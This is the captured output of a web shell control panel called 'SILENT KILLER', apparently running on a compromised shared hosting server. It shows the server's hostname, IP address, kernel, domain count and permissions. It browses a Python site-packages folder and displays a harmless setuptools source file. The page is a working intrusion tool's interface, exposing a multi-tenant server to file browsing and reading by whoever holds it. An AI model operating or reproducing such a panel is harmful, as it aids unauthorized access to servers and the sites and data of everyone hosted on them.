SILENT KILLERPanel

Current Path: > > opt > cloudlinux > venv > lib > > python3.11 > site-packages > setuptools > _distutils > compat


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //opt/cloudlinux/venv/lib//python3.11/site-packages/setuptools/_distutils/compat

NameTypeSizeLast ModifiedActions
__pycache__ Directory - -
__init__.py File 522 bytes April 17 2025 13:10:58.
numpy.py File 167 bytes April 17 2025 13:10:58.
py39.py File 1964 bytes April 17 2025 13:10:58.

Reading File: //opt/cloudlinux/venv/lib//python3.11/site-packages/setuptools/_distutils/compat/__init__.py

from __future__ import annotations

from collections.abc import Iterable
from typing import TypeVar

_IterableT = TypeVar("_IterableT", bound="Iterable[str]")


def consolidate_linker_args(args: _IterableT) -> _IterableT | str:
    """
    Ensure the return value is a string for backward compatibility.

    Retain until at least 2025-04-31. See pypa/distutils#246
    """

    if not all(arg.startswith('-Wl,') for arg in args):
        return args
    return '-Wl,' + ','.join(arg.removeprefix('-Wl,') for arg in args)

SILENT KILLER Tool